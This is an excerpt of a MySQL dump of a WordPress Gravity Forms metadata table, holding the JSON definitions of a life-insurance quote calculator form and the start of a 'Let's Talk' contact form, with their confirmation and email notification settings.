/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_gf_form_meta` (
  `form_id` mediumint(10) unsigned NOT NULL,
  `display_meta` longtext DEFAULT NULL,
  `entries_grid_meta` longtext DEFAULT NULL,
  `confirmations` longtext DEFAULT NULL,
  `notifications` longtext DEFAULT NULL,
  PRIMARY KEY (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_gf_form_meta`
--

LOCK TABLES `wpfi_gf_form_meta` WRITE;
/*!40000 ALTER TABLE `wpfi_gf_form_meta` DISABLE KEYS */;
INSERT INTO `wpfi_gf_form_meta` VALUES (1,'{\"title\":\"Quote Form\",\"description\":\"\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\",\"width\":\"auto\",\"location\":\"bottom\",\"layoutGridColumnSpan\":12},\"fields\":[{\"type\":\"date\",\"id\":3,\"formId\":1,\"label\":\"Date of birth\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":[{\"id\":\"3.1\",\"label\":\"Month\",\"name\":\"\"},{\"id\":\"3.2\",\"label\":\"Day\",\"name\":\"\"},{\"id\":\"3.3\",\"label\":\"Year\",\"name\":\"\"}],\"dateType\":\"datefield\",\"dateFormat\":\"mdy\",\"dateFormatPlacement\":\"below\",\"calendarIconType\":\"none\",\"description\":\"Age is one of the many factors that determines your life insurance rates.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"calendarIconUrl\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"8751397a\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"radio\",\"id\":4,\"formId\":1,\"label\":\"Gender\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"validateState\":true,\"inputs\":null,\"choices\":[{\"text\":\"Female\",\"value\":\"Female\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Male\",\"value\":\"Male\",\"isSelected\":false,\"price\":\"\"}],\"description\":\"Most insurers do not offer a gender-neutral or nonbinary option on their applications, but if you are transgender, you can choose your actual gender, not your gender assigned at birth.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box btn_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableOtherChoice\":\"\",\"enablePrice\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"8c71f0bc\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"number\",\"id\":5,\"formId\":1,\"label\":\"Annual income\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"currency\",\"description\":\"Your total annual salary and\\/or earnings, before taxes.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"enableCalculation\":false,\"rangeMin\":false,\"rangeMax\":false,\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"4ab163e7\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"radio\",\"id\":6,\"formId\":1,\"label\":\"Do you have a spouse or partner?\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"validateState\":true,\"inputs\":null,\"choices\":[{\"text\":\"Yes\",\"value\":\"Yes\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"No\",\"value\":\"No\",\"isSelected\":false,\"price\":\"\"}],\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box btn_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableOtherChoice\":\"\",\"enablePrice\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"b1e81976\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"number\",\"id\":7,\"formId\":1,\"label\":\"Number of children under age 18\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"decimal_dot\",\"description\":\"We\'ll take the number and ages of your children into account when calculating your coverage.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"enableCalculation\":false,\"rangeMin\":\"\",\"rangeMax\":\"\",\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"fd371e7f\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"number\",\"id\":13,\"formId\":1,\"label\":\"Age of youngest child\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"decimal_dot\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":{\"enabled\":true,\"actionType\":\"show\",\"logicType\":\"all\",\"rules\":[{\"fieldId\":\"7\",\"operator\":\">\",\"value\":\"0\"}]},\"enableCalculation\":false,\"rangeMin\":\"\",\"rangeMax\":\"\",\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"9699ccdc\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"radio\",\"id\":14,\"formId\":1,\"label\":\"Do you want to include an additional amount to cover college costs?\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"validateState\":true,\"inputs\":null,\"choices\":[{\"text\":\"Yes\",\"value\":\"Yes\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"No\",\"value\":\"No\",\"isSelected\":false,\"price\":\"\"}],\"description\":\"We\'ll add an amount per child that represents the average cost of a four-year degree.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box btn_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"conditionalLogic\":{\"enabled\":true,\"actionType\":\"show\",\"logicType\":\"all\",\"rules\":[{\"fieldId\":\"7\",\"operator\":\">\",\"value\":\"0\"}]},\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableOtherChoice\":\"\",\"enablePrice\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"d63412d9\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"number\",\"id\":8,\"formId\":1,\"label\":\"Total household debt\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"currency\",\"description\":\"Include all debts, such as mortgages, student loans, car loans, credit cards, etc.\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"enableCalculation\":false,\"rangeMin\":false,\"rangeMax\":false,\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"dfa19c81\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"number\",\"id\":9,\"formId\":1,\"label\":\"Total household savings\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"currency\",\"description\":\"Your total household liquid savings (i.e. the funds are accessible without taxes or other penalties whenever you need them).\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"two_box\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"enableCalculation\":false,\"rangeMin\":false,\"rangeMax\":false,\"calculationFormula\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"571a7623\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"checkboxLabel\":\"\"},{\"type\":\"name\",\"id\":10,\"formId\":1,\"label\":\"Name\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"nameFormat\":\"advanced\",\"inputs\":[{\"id\":\"10.2\",\"label\":\"Prefix\",\"name\":\"\",\"autocompleteAttribute\":\"honorific-prefix\",\"choices\":[{\"text\":\"Dr.\",\"value\":\"Dr.\"},{\"text\":\"Miss\",\"value\":\"Miss\"},{\"text\":\"Mr.\",\"value\":\"Mr.\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\"},{\"text\":\"Ms.\",\"value\":\"Ms.\"},{\"text\":\"Mx.\",\"value\":\"Mx.\"},{\"text\":\"Prof.\",\"value\":\"Prof.\"},{\"text\":\"Rev.\",\"value\":\"Rev.\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"10.3\",\"label\":\"First\",\"name\":\"\",\"autocompleteAttribute\":\"given-name\",\"placeholder\":\"First\"},{\"id\":\"10.4\",\"label\":\"Middle\",\"name\":\"\",\"autocompleteAttribute\":\"additional-name\",\"isHidden\":true},{\"id\":\"10.6\",\"label\":\"Last\",\"name\":\"\",\"autocompleteAttribute\":\"family-name\",\"placeholder\":\"Last\"},{\"id\":\"10.8\",\"label\":\"Suffix\",\"name\":\"\",\"autocompleteAttribute\":\"honorific-suffix\",\"isHidden\":true}],\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"hidden_label\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"a4dfc8ae\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"checkboxLabel\":\"\",\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"email\",\"id\":11,\"formId\":1,\"label\":\"Email\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"autocompleteAttribute\":\"email\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":6,\"emailConfirmEnabled\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"6f91869d\",\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"phone\",\"id\":12,\"formId\":1,\"label\":\"Phone\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"phoneFormat\":\"international\",\"autocompleteAttribute\":\"tel\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":6,\"enableEnhancedUI\":0,\"layoutGroupId\":\"6f91869d\",\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"number\",\"id\":15,\"formId\":1,\"label\":\"Your estimated amount of insurance needed is\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"numberFormat\":\"currency\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"q_btn\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":{\"enabled\":true,\"actionType\":\"show\",\"logicType\":\"all\",\"rules\":[{\"fieldId\":\"5\",\"operator\":\"isnot\",\"value\":\"\"},{\"fieldId\":\"10.3\",\"operator\":\"isnot\",\"value\":\"\"},{\"fieldId\":\"10.6\",\"operator\":\"isnot\",\"value\":\"\"},{\"fieldId\":\"11\",\"operator\":\"isnot\",\"value\":\"\"},{\"fieldId\":\"12\",\"operator\":\"isnot\",\"value\":\"\"}]},\"enableCalculation\":true,\"rangeMin\":false,\"rangeMax\":false,\"calculationFormula\":\"{Annual income:5} * 10\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"def0c97f\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationRounding\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"displayOnly\":\"\"},{\"type\":\"html\",\"id\":19,\"formId\":1,\"label\":\"Disclaimer\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"displayOnly\":true,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"content\":\"<i>These estimates are for educational purposes only and shouldn\'t take the place of professional advice. Your coverage needs may vary based on other factors not considered here. Interested in more personalized quotes? Call <a href=\\\"tel:1-713-254-3439\\\">1-713-254-3439<\\/a> to speak with one of our licensed agents.<\\/i>\",\"disableMargins\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"57f34c05\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\"}],\"version\":\"2.7.3\",\"id\":1,\"markupVersion\":2,\"nextFieldId\":20,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"gfpdf_form_settings\":{\"640d602b58e17\":{\"name\":\"Quote\",\"template\":\"zadani\",\"notification\":{\"64074ce3dce45\":\"64074ce3dce45\"},\"filename\":\"quote\",\"conditionalLogic\":null,\"pdf_size\":\"A4\",\"custom_pdf_size\":[\"\",\"\",\"millimeters\"],\"orientation\":\"portrait\",\"font\":\"dejavusanscondensed\",\"font_size\":\"10\",\"font_colour\":\"#000000\",\"zadani_border_colour\":\"#CCCCCC\",\"show_form_title\":\"Yes\",\"enable_conditional\":\"Yes\",\"background_color\":\"#FFF\",\"background_image\":\"\",\"header\":\"\",\"first_header\":\"\",\"footer\":\"\",\"first_footer\":\"\",\"format\":\"Standard\",\"password\":\"\",\"privileges\":{\"copy\":\"copy\",\"print\":\"print\",\"print-highres\":\"print-highres\",\"modify\":\"modify\",\"annot-forms\":\"annot-forms\",\"fill-forms\":\"fill-forms\",\"extract\":\"extract\",\"assemble\":\"assemble\"},\"master_password\":\"\",\"image_dpi\":\"96\",\"save\":\"\",\"conditional\":\"\",\"rtl\":\"\",\"security\":\"\",\"public_access\":\"\",\"restrict_owner\":\"\",\"id\":\"640d602b58e17\",\"active\":true}},\"is_active\":\"1\",\"date_created\":\"2023-03-07 14:40:35\",\"is_trash\":\"0\",\"subLabelPlacement\":\"below\",\"requiredIndicator\":\"asterisk\",\"customRequiredIndicator\":\"(Required)\",\"cssClass\":\"tc\",\"saveButtonText\":\"Save & Continue\",\"limitEntries\":false,\"limitEntriesCount\":\"\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":false,\"scheduleStart\":\"\",\"scheduleEnd\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":false,\"requireLoginMessage\":\"\",\"honeypotAction\":\"abort\",\"validationSummary\":false,\"deprecated\":\"\",\"saveEnabled\":\"\",\"enableHoneypot\":false,\"enableAnimation\":false,\"save\":{\"enabled\":false,\"button\":{\"type\":\"link\",\"text\":\"Save & Continue\"}},\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\"}',NULL,'{\"64074ce3dcf26\":{\"id\":\"64074ce3dcf26\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"<p class=\\\"qut\\\" style=\\\"text-align: center;\\\">Your estimated amount of insurance needed is <strong>{Estimated Life insurance:15}<\\/strong><\\/p>\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\",\"event\":\"\",\"disableAutoformat\":false,\"page\":\"\",\"conditionalLogic\":[]}}','{\"64074ce3dce45\":{\"id\":\"64074ce3dce45\",\"isActive\":true,\"to\":\"info@JSuttonFinacial.com\",\"name\":\"Admin Notification\",\"event\":\"form_submission\",\"toType\":\"email\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\",\"service\":\"wordpress\",\"toEmail\":\"info@JSuttonFinacial.com\",\"toField\":\"\",\"routing\":null,\"fromName\":\"\",\"from\":\"{admin_email}\",\"replyTo\":\"\",\"bcc\":\"\",\"disableAutoformat\":false,\"notification_conditional_logic_object\":\"\",\"notification_conditional_logic\":\"0\",\"conditionalLogic\":null,\"cc\":\"\",\"enableAttachments\":false}}'),(2,'{\"labelPlacement\":\"top_label\",\"useCurrentUserAsAuthor\":\"1\",\"postAuthor\":\"1\",\"postCategory\":\"1\",\"postStatus\":\"draft\",\"title\":\"Let\'s Talk\",\"description\":\"\",\"maxEntriesAllowed\":\"0\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\",\"conditionalLogic\":\"\",\"width\":\"auto\",\"location\":\"bottom\",\"layoutGridColumnSpan\":12,\"id\":\"submit\"},\"fields\":[{\"type\":\"email\",\"id\":2,\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"please supply a valid email address\",\"label\":\"Email\",\"inputType\":\"\",\"displayOnly\":\"\",\"inputs\":null,\"choices\":\"\",\"conditionalLogic\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"allowsPrepopulate\":false,\"useRichTextEditor\":false,\"visibility\":\"visible\",\"fields\":\"\",\"inputMaskIsCustom\":false,\"layoutGroupId\":\"bb03a6f9\",\"autocompleteAttribute\":\"\",\"emailConfirmEnabled\":false,\"adminLabel\":\"\",\"description\":\"\",\"maxLength\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":true,\"defaultValue\":\"\",\"enableAutocomplete\":true,\"pageNumber\":1,\"formId\":2,\"layoutGridColumnSpan\":12,\"personalDataExport\":false,\"personalDataErase\":false},{\"type\":\"text\",\"id\":4,\"formId\":2,\"label\":\"Last Name\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enablePasswordInput\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"41c7f65f\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"personalDataExport\":false,\"personalDataErase\":false,\"displayOnly\":\"\"},{\"type\":\"text\",\"id\":5,\"formId\":2,\"label\":\"First Name\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enablePasswordInput\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"7c1810a2\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"errors\":[],\"pageNumber\":1,\"fields\":\"\",\"personalDataExport\":false,\"personalDataErase\":false,\"displayOnly\":\"\"},{\"type\":\"phone\",\"id\":9,\"formId\":2,\"label\":\"Phone\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"phoneFormat\":\"international\",\"autocompleteAttribute\":\"tel\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"